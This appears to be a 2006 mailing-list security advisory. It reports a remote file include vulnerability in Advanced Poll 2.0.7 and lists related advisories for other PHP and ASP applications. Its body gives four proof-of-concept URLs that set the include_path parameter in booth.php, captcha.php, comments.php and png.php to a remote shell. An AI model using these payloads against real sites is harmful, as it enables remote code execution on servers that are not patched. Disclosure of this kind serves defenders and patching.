Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability

PHPQuickGallery <= 1.9 (textFile) Remote File Include Vulnerability

ASPNuke <= 0.80 (register. asp) Remote SQL Injection Vulnerability

A-Cart 2.0 SQL Injection

From:	beks beks beks <beks__(at)_msn.com>
Date:	20.11.2006
Subject:	Advanced Poll 2.0.7 Remote File Include Vulnerability

########################################
#Advanced Poll
########################################
#Advanced Poll 2.0.7 Remote File Include Vulnerability
########################################
#Found by: beks
########################################
#Bug in booth.php captcha.php comments.php png.php
#
#www.site.com/[path]/booth.php?include_path=shell
#www.site.com/[path]/captcha.php?include_path=shell
#www.site.com/[path]/comments.php?include_path=shell
#www.site.com/[path]/png.php?include_path=shell
########################################

_________________________________________________________________
Sevdiklerinizle Messenger'da gorusun ve sesli sohbet edin!
http://messenger.live.com